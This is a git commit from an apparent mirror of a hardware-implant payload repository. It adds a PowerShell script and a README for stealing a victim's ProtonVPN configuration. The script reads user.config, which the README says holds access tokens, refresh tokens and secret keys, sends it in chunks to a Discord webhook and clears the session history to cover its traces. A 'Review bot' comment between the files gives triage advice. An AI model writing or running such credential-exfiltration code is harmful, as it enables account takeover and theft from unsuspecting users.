mirror of https://github.com/hak5/omg-payloads.git
script
parent
d7d4431c04
commit
c0cd28c287
|
@ -0,0 +1,37 @@
|
|||
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
|
||||
|
||||
$Content = Get-Content -Path $Path
|
||||
|
||||
$text = $Path + $Content
|
||||
|
||||
# Discord Connection
|
||||
$hookurl = "$discord"
|
||||
|
||||
# Loop for Discord
|
||||
$ConstantLimitForRestMethod = 1999
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = ""
|
||||
}
|
||||
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||
try {
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||
}
|
||||
} catch [ArgumentOutOfRangeException] {
|
||||
if($text.Length-$i -gt 0){
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text.Substring($i, $text.Length-$i)
|
||||
}
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||
}
|
||||
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
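Review bot: The comment `# Clear the PowerShell command history` above the final `Clear-History` call overstates what that cmdlet does, and the script has no header stating what it reads and where it sends it. `Clear-History` removes only the current session's in-memory entries, so a more accurate comment is `# Clear-History affects only this session's Get-History list; PSReadLine's saved history and script block logging (event 4104) are untouched`. For anyone triaging this payload, the behaviour visible in these lines is a `Get-Content` read of `user.config` under `%USERPROFILE%\AppData\Local\ProtonVPN`, followed by `Invoke-RestMethod` POSTs of up to 1999 characters each to the webhook URL taken from `$discord`, which is defined outside this file. If that file holds the tokens and keys the accompanying README lists, a detection on this pattern should be handled as credential exposure, with the affected ProtonVPN sessions revoked.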
|
|
@ -0,0 +1,37 @@
|
|||
# ProtonVPN config file ✅
|
||||
|
||||
A script used to stole target ProtonVPN config file.
|
||||
|
||||
**Category**: Credentials, Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
This script will stole target ProtonVPN config file.
|
||||
|
||||
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
In the config file you can find a lot information about the user like:
|
||||
- UserUid
|
||||
- UserAccessToken
|
||||
- UserRefreshToken
|
||||
- UserAuthenticationPublicKey
|
||||
- UserAuthenticationSecretKey
|
||||
- UserAuthenticationCertificatePem
|
||||
- UserCertificationServerPublicKey
|
||||
- and so on...
|
||||
|
||||
Then it cleans up traces of what you have done after.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* ProtonVPN user logged at least one time
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|